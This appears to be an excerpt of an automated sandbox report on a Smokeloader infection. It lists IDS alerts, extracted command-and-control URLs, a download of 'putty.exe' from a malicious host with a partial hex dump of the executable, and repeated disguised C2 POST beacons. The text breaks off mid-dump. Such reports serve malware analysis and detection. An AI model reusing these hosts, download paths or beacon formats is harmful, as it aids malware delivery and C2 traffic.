                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49973 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49954 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49988 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49985 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.7:49985 -> 94.156.177.51:80
                Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 194.85.61.76 80Jump to behavior
                Source: Malware configuration extractorURLs: http://constractionscity1991.lat/
                Source: Malware configuration extractorURLs: http://restructurisationservice.ru/
                Source: Malware configuration extractorURLs: http://connecticutproperty.ru/
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 19 Dec 2024 06:52:21 GMTContent-Type: application/x-msdos-programContent-Length: 295424Connection: keep-aliveLast-Modified: Thu, 19 Dec 2024 06:52:21 GMTETag: W/"48200-62999fe73c900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 cf c2 6a d7 ae ac 39 d7 ae ac 39 d7 ae ac 39 c9 fc 39 39 cd ae ac 39 c9 fc 2f 39 51 ae ac 39 c9 fc 28 39 fd ae ac 39 f0 68 d7 39 d4 ae ac 39 d7 ae ad 39 ac ae ac 39 c9 fc 26 39 d6 ae ac 39 c9 fc 38 39 d6 ae ac 39 c9 fc 3d 39 d6 ae ac 39 52 69 63 68 d7 ae ac 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 c4 9b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 03 00 00 04 01 00 00 00 00 00 a2 49 00 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 ba f9 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 ea 03 00 28 00 00 00 00 b0 04 00 e0 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 2e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1a e3 03 00 00 10 00 00 00 e4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e8 ac 00 00 00 00 04 00 00 60 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 39 00 00 00 b0 04 00 00 3a 00 00 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: GET /fdjskf88cvt/yumba/putty.exe HTTP/1.1Host: spotcarservice.ruConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 194.85.61.76 194.85.61.76
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejrtkkisotoyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdajeakwfdnw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hsoudoxnfim.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hrhyeqldvhuev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgsvxfdiyvhaenj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esbcbgncmnjrnqow.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kbqjcqfmijujbph.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://osytirdulvnll.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lndihcelygbnm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://almthodjcmij.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrebwhkbvdffjj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uniikaknxvfyxea.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cysylnlcrra.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqbxkgmkuhr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doueaoxbsbt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvghuvrbeajfrwtn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qohqjraearkdgi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpxplxtebuujf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: connecticutproperty.ru
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /fdjskf88cvt/yumba/putty.exe HTTP/1.1Host: spotcarservice.ruConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: time.windows.com
                Source: global trafficDNS traffic detected: DNS query: spotcarservice.ru
                Source: global trafficDNS traffic detected: DNS query: constractionscity1991.lat
                Source: global trafficDNS traffic detected: DNS query: restructurisationservice.ru
                Source: global trafficDNS traffic detected: DNS query: connecticutproperty.ru
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejrtkkisotoyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:52:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:52:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:53:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 